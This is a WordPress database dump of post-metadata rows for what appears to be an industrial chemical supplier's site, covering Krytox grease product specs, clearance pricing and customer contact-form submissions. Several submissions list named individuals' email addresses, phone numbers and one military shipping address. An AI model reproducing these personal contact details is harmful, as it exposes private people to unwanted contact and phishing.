INSERT INTO `wp_postmeta` VALUES (32910, 3700, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32911, 3700, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32912, 3700, '_field_1', 'Shirley Meyer'); 
INSERT INTO `wp_postmeta` VALUES (32913, 3700, '_field_10', 'Mars GC Solutions LLC'); 
INSERT INTO `wp_postmeta` VALUES (32914, 3700, '_field_2', 'shirley.meyer@mars-gc.com'); 
INSERT INTO `wp_postmeta` VALUES (32915, 3700, '_field_8', '(281) 993-8502'); 
INSERT INTO `wp_postmeta` VALUES (32916, 3700, '_field_3', 'I need a small amount of Krytox Oil 143AY, 2 oz-16 oz.  Do you carry this one?  '); 
INSERT INTO `wp_postmeta` VALUES (32917, 3700, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32918, 3700, '_sub_id', '3700'); 
INSERT INTO `wp_postmeta` VALUES (32919, 3701, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32920, 3701, '_seq_num', '234'); 
INSERT INTO `wp_postmeta` VALUES (32921, 3701, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32922, 3701, '_field_12', 'Victor Marco Ruiz'); 
INSERT INTO `wp_postmeta` VALUES (32923, 3701, '_field_13', 'Airbus Defende &amp; Space'); 
INSERT INTO `wp_postmeta` VALUES (32924, 3701, '_field_18', 'Airbus Defende &amp; Space'); 
INSERT INTO `wp_postmeta` VALUES (32925, 3701, '_field_14', 'victor.marco@airbus.com'); 
INSERT INTO `wp_postmeta` VALUES (32926, 3701, '_field_15', '(034) 954-5964'); 
INSERT INTO `wp_postmeta` VALUES (32927, 3701, '_field_16', 'We are using MS-260 cleaner and we would need to know the Shelf Life information (storage life) that we can hold the product in the warehouse without loosing its mechanical properties.\n\nCould you send me the Technical Data Sheet of MS-260?\n\nThank you in advance,\nRegards,\n\nVictor Marco\nAibus D&amp;S'); 
INSERT INTO `wp_postmeta` VALUES (32928, 3701, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32929, 3701, '_sub_id', '3701'); 
INSERT INTO `wp_postmeta` VALUES (32930, 3703, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32931, 3703, '_seq_num', '363'); 
INSERT INTO `wp_postmeta` VALUES (32932, 3703, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32933, 3703, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32934, 3703, '_field_1', 'Pamela'); 
INSERT INTO `wp_postmeta` VALUES (32935, 3703, '_field_10', 'Dirats Labatories'); 
INSERT INTO `wp_postmeta` VALUES (32936, 3703, '_field_2', 'pel@diratslabs.com'); 
INSERT INTO `wp_postmeta` VALUES (32937, 3703, '_field_8', '(413) 568-1571'); 
INSERT INTO `wp_postmeta` VALUES (32938, 3703, '_field_3', 'I am fairly new to Dirats and have been given a task to organize our SDS sheets. I was looking at your list and was unable to find 2. Your help would be greatly appreciated. MS-122RB and MS-222. Thank you '); 
INSERT INTO `wp_postmeta` VALUES (32939, 3703, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32940, 3703, '_sub_id', '3703'); 
INSERT INTO `wp_postmeta` VALUES (32941, 3704, '_edit_lock', '1487945254:2'); 
INSERT INTO `wp_postmeta` VALUES (32942, 3704, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (32944, 3706, '_edit_lock', '1487947342:2'); 
INSERT INTO `wp_postmeta` VALUES (32945, 3706, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (32946, 3706, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (32947, 3706, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (32948, 3706, '_thumbnail_id', '381'); 
INSERT INTO `wp_postmeta` VALUES (32949, 3706, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (32950, 3706, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (32951, 3706, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (32952, 3706, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (32953, 3706, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (32954, 3706, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (32955, 3706, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (32956, 3706, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (32957, 3706, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (32958, 3706, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (32959, 3706, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (32960, 3706, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32961, 3706, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32962, 3706, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (32963, 3706, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32964, 3706, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (32965, 3706, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (32966, 3706, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (32967, 3706, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (32968, 3706, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (32969, 3706, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (32970, 3706, '_regular_price', '13000'); 
INSERT INTO `wp_postmeta` VALUES (32971, 3706, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (32972, 3706, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (32973, 3706, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (32974, 3706, '_price', '13000'); 
INSERT INTO `wp_postmeta` VALUES (32975, 3706, '_sold_individually', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (32976, 3706, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32977, 3706, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32978, 3706, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (32979, 3706, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (32980, 3706, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (32981, 3706, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (32982, 3706, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32983, 3706, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (32984, 3706, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (32985, 3706, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (32986, 3706, '_ywtm_content_tab_description', 'Clearance for Krytox GPL 207 20 KG Pail.'); 
INSERT INTO `wp_postmeta` VALUES (32987, 3706, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (32988, 3706, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (32989, 3706, '_yoast_wpseo_primary_product_cat', '513'); 
INSERT INTO `wp_postmeta` VALUES (32990, 3706, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (32991, 3706, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (32992, 3706, '_yoast_wpseo_title', 'Krytox GPL 207 20KG Clearance - Fire Sale - Discounted Pricing'); 
INSERT INTO `wp_postmeta` VALUES (32993, 3706, '_yoast_wpseo_metadesc', 'Miller-Stephenson is running a fire sale for all excess Krytox material at low costs. Krytox GPL 207 20KG Pail is on clearance.'); 
INSERT INTO `wp_postmeta` VALUES (32994, 3708, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32995, 3708, '_seq_num', '364'); 
INSERT INTO `wp_postmeta` VALUES (32996, 3708, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32997, 3708, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32998, 3708, '_field_1', 'Jarret Hebert'); 
INSERT INTO `wp_postmeta` VALUES (32999, 3708, '_field_10', 'MRC Global'); 
INSERT INTO `wp_postmeta` VALUES (33000, 3708, '_field_2', 'jarret.hebert@mrcglobal.com'); 
INSERT INTO `wp_postmeta` VALUES (33001, 3708, '_field_8', '(985) 879-3341'); 
INSERT INTO `wp_postmeta` VALUES (33002, 3708, '_field_3', 'Need price and availability on 3 gallons of DuPont Vertrel MS-752'); 
INSERT INTO `wp_postmeta` VALUES (33003, 3708, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33004, 3708, '_sub_id', '3708'); 
INSERT INTO `wp_postmeta` VALUES (33005, 3709, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33006, 3709, '_seq_num', '365'); 
INSERT INTO `wp_postmeta` VALUES (33007, 3709, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33008, 3709, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33009, 3709, '_field_1', 'Charles Glotzbach'); 
INSERT INTO `wp_postmeta` VALUES (33010, 3709, '_field_10', '402 Avionics Electronic Maintenance'); 
INSERT INTO `wp_postmeta` VALUES (33011, 3709, '_field_2', 'charles.glotzbach@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (33012, 3709, '_field_8', '(478) 222-5207'); 
INSERT INTO `wp_postmeta` VALUES (33013, 3709, '_field_3', 'email a price quote with estimated shipping for 3 five gallon containers of your MS-582 DPMS-C0723B precision cleaner solvent.\nshipping address 402 EMXG/MXDEO HAZMAT, 635 Tech Road, BLDG 639 Robins AFB, GA. 31098'); 
INSERT INTO `wp_postmeta` VALUES (33014, 3709, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33015, 3709, '_sub_id', '3709'); 
INSERT INTO `wp_postmeta` VALUES (33016, 3710, '_edit_lock', '1487962123:2'); 
INSERT INTO `wp_postmeta` VALUES (33017, 3710, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33018, 3711, '_wp_attached_file', '2017/02/Sootblower-GB-M0.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33019, 3711, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1075;s:6:"height";i:806;s:4:"file";s:28:"2017/02/Sootblower-GB-M0.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"Sootblower-GB-M0-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"Sootblower-GB-M0-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"Sootblower-GB-M0-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"Sootblower-GB-M0-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"Sootblower-GB-M0-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"Sootblower-GB-M0-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"Sootblower-GB-M0-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33020, 3710, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (33021, 3710, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (33022, 3710, '_thumbnail_id', '3711'); 
INSERT INTO `wp_postmeta` VALUES (33023, 3710, '312_default_editor', '<table width="1093">\r\n<tbody>\r\n<tr>\r\n<td width="373"><strong>Krytox Gearbox Grease Grade</strong></td>\r\n<td style="text-align: center;" width="180">GB M0</td>\r\n<td style="text-align: center;" width="180">GB H0</td>\r\n<td style="text-align: center;" width="180">GB A2</td>\r\n<td style="text-align: center;" width="180">GB C2</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration, ASTM D217</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">265–295</td>\r\n<td style="text-align: center;">265–295</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener Chemistry</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point, °C (°F)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, 40 °C (104 °F)</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Useful Temperature Range, °C (°F)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33024, 3710, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33025, 3710, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33026, 3710, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33027, 3710, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33028, 3710, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33029, 3710, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (33030, 3710, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33031, 3710, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33032, 3710, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33033, 3710, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (33034, 3710, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33035, 3710, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33036, 3710, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (33037, 3710, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33038, 3710, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (33039, 3710, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (33040, 3710, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (33041, 3710, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (33042, 3710, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (33043, 3710, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33044, 3710, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33045, 3710, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33046, 3710, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (33047, 3710, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (33048, 3710, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33049, 3710, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (33050, 3710, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33051, 3710, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33052, 3710, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (33053, 3710, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33054, 3710, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33055, 3710, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (33056, 3710, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33057, 3710, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33058, 3710, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (33059, 3710, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (33060, 3710, '_ywtm_content_tab_description', '<h3>Krytox GB M0 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB M0 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.'); 
INSERT INTO `wp_postmeta` VALUES (33061, 3710, '_product_image_gallery', '383'); 
INSERT INTO `wp_postmeta` VALUES (33062, 3710, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33063, 3710, '_yoast_wpseo_primary_product_cat', '515'); 
INSERT INTO `wp_postmeta` VALUES (33064, 3710, '_yoast_wpseo_focuskw_text_input', 'Krytox GB M0'); 
INSERT INTO `wp_postmeta` VALUES (33065, 3710, '_yoast_wpseo_focuskw', 'Krytox GB M0'); 
INSERT INTO `wp_postmeta` VALUES (33066, 3710, '_yoast_wpseo_title', 'Krytox GB M0 | Krytox Sootblower Gearbox Grease | Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33067, 3710, '_yoast_wpseo_metadesc', 'Krytox GB M0 fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments.'); 
INSERT INTO `wp_postmeta` VALUES (33068, 3710, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33069, 3710, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33070, 3710, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (33071, 3712, '_wp_attached_file', '2017/02/Sootblower-Gearbox-Grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33072, 3712, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1138;s:6:"height";i:852;s:4:"file";s:37:"2017/02/Sootblower-Gearbox-Grease.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"Sootblower-Gearbox-Grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"Sootblower-Gearbox-Grease-800x599.jpg";s:5:"width";i:800;s:6:"height";i:599;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"Sootblower-Gearbox-Grease-768x575.jpg";s:5:"width";i:768;s:6:"height";i:575;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"Sootblower-Gearbox-Grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"Sootblower-Gearbox-Grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"Sootblower-Gearbox-Grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"Sootblower-Gearbox-Grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33073, 3713, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33074, 3713, '_seq_num', '366'); 
INSERT INTO `wp_postmeta` VALUES (33075, 3713, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33076, 3713, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33077, 3713, '_field_1', 'Christina Anderson'); 
INSERT INTO `wp_postmeta` VALUES (33078, 3713, '_field_10', 'USMC'); 
INSERT INTO `wp_postmeta` VALUES (33079, 3713, '_field_2', 'christina.anderson@aecom.com'); 
INSERT INTO `wp_postmeta` VALUES (33080, 3713, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33081, 3713, '_field_3', 'Looking for the up to date SDS for product: MS-122DF but didn&#039;t see it on your SDS database.  Has the product been discontinued or has the name of the product changed slightly? Thank you for your assistance.'); 
INSERT INTO `wp_postmeta` VALUES (33082, 3713, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33083, 3713, '_sub_id', '3713'); 
INSERT INTO `wp_postmeta` VALUES (33084, 3714, '_wp_attached_file', '2017/02/shutterstock_503819962.jpg'); 
